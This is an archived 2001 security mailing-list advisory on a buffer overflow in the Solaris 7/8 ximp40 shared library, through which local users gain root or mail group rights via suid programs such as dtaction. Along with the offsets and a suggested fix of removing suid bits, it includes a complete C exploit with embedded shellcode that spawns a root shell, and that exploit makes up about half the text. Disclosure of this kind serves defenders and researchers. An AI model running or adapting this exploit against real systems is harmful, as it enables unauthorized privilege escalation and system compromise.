OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: UNYUN (shadowpenguinBACKSECTION.NET)
Date: Wed Jan 31 2001 - 07:24:32 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    SPS Advisory #40

    Solaris7/8 ximp40 shared library buffer overflow

    UNYUN <shadowpenguinbacksection.net>
    Shadow Penguin Security (http://shadowpenguin.backsection.net)

    --------------------------------------------------------------

    [Date]
    Jan. 30, 2001

    [Vulnerable]
    Solaris 8 Intel & Sparc edition
    Solaris 7 Intel & Sparc edition

    [Not vulnerable]
    unknown

    [Overview]
       Shared library "ximp40" which is installed on Solaris7 and 8 by
    default has buffer overflow bug, the local user can obtain root
    privilege or mail gid by using the following suid/sgid programs which
    are using the shared library ximp40.

    *Solaris 8
    suid root : /usr/dt/bin/dtaction
    suid root : /usr/dt/bin/dtprintinfo
    suid root : /usr/openwin/bin/sys-suspend
    sgid mail : /usr/dt/bin/dtmail
    sgid mail : /usr/openwin/bin/mailtool

    *Solaris 7
    suid root : /usr/dt/bin/dtaction
    suid root : /usr/dt/bin/dtprintinfo
    suid root : /usr/dt/bin/dtappgather
    suid root : /usr/bin/admintool
    suid root : /usr/openwin/bin/sys-suspend
    sgid mail : /usr/dt/bin/dtmail
    sgid mail : /usr/openwin/bin/mailtool

       The exploitable buffer overflow occurs when the long string is
    specified to "arg0" of previous listed programs. This buffer overflow
    overwrites the stack area which includes RET address, EIP can be
    changed to the value which is specified inside arg0.

    [Details]
      We explain this problem by /usr/dt/bin/dtaction which is installed
    on Solaris8.
      This overflow becomes exploitable if the appropriate value is set in
     buffer offset 264 to 267, EIP can be changed to specified value which
     is located in buffer offset 260 to 263

    [Avoidance]
      Clear the suid/sgid bit of all programs which are listed in [Overview].

    [Caution]
       We will change this information without any notice. Use of this
    information constitutes acceptance for use in an AS IS condition.
    There are NO warranties with regard to this information. In no event
    shall the author be liable for any damages whatever arising out of or
    in connection with the use or spread of this information. Any use of
    this information is only for personal experiment.

    [Comments ?]
    If you have something comments, please send to following address..

    UNYUN <shadowpenguinbacksection.net>
    http://shadowpenguin.backsection.net

    [Sample code]
       This exploit obtain root privilege by using /usr/dt/bin/dtaction.
    This is tested on Solaris8 Intel edition only.

    /*====================================================================
       Solaris ximp40 shared library exploit for Solaris8 Intel Edition
       The Shadow Penguin Security (http://shadowpenguin.backsection.net)
       Written by UNYUN (shadowpenguinbacksection.net)
       [usage]
        #xhost +targethost
        #telnet targethost
        ...
        %setenv DISPLAY yourhost:0.0
        %gcc ximp40.c
        %./a.out
        0:Default value 1:Calculated value > 1 <- Input 0 or 1
      ====================================================================
    */

    #include <stdio.h>

    #define BUF_SIZE 272
    #define EIP_OFFSET 260
    #define FAKE_OFFSET 264
    #define FAKE_VALUE 0x08046dec
    #define EIP_VALUE 0x08047cb4
    #define FAKE_VALUE_DIF 0xd9c
    #define EIP_VALUE_DIF 0x12c
    #define NOP 0x90

    char shell_code[]=
      "\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xc1"
      "\x88\x46\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x17\xe8\xdf"
      "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89"
      "\x5e\x08\x53\xb0\x3b\xe8\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8\xff"
      "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff"
      "\xff\xff";

    unsigned long get_sp(void)
    {
      __asm__(" movl %esp,%eax ");
    }

    void valset(char *p,unsigned int val)
    {
        *p=val&0xff;
        *(p+1)=(val>>8)&0xff;
        *(p+2)=(val>>16)&0xff;
        *(p+3)=(val>>24)&0xff;
    }

    main()
    {
        char buf[BUF_SIZE];
        unsigned int esp=get_sp(),sw;

        memset(buf,NOP,BUF_SIZE);
        memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code,
               strlen(shell_code));

        printf("esp=%x\n",esp);
        printf("0:Default value 1:Calculated value >");
        fflush(stdout);
        scanf("%d",&sw);
        if (sw==0){
            valset(buf+FAKE_OFFSET, FAKE_VALUE);
            valset(buf+EIP_OFFSET , EIP_VALUE);
            printf("Jumping address = %x\n",EIP_VALUE);
        }else{
            valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF);
            valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF);
            printf("Jumping address = %x\n",esp+EIP_VALUE_DIF);
        }
        buf[BUF_SIZE-1]=0;

        execl("/usr/dt/bin/dtaction",buf,NULL);
    }

    -----
    UNYUN
    % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
       shadowpenguinbacksection.net (SPS-Official)
       unyunshadowpenguin.org (Personal)
    % eEye Digital Security Team [ http://www.eEye.com ]
       unyuneEye.com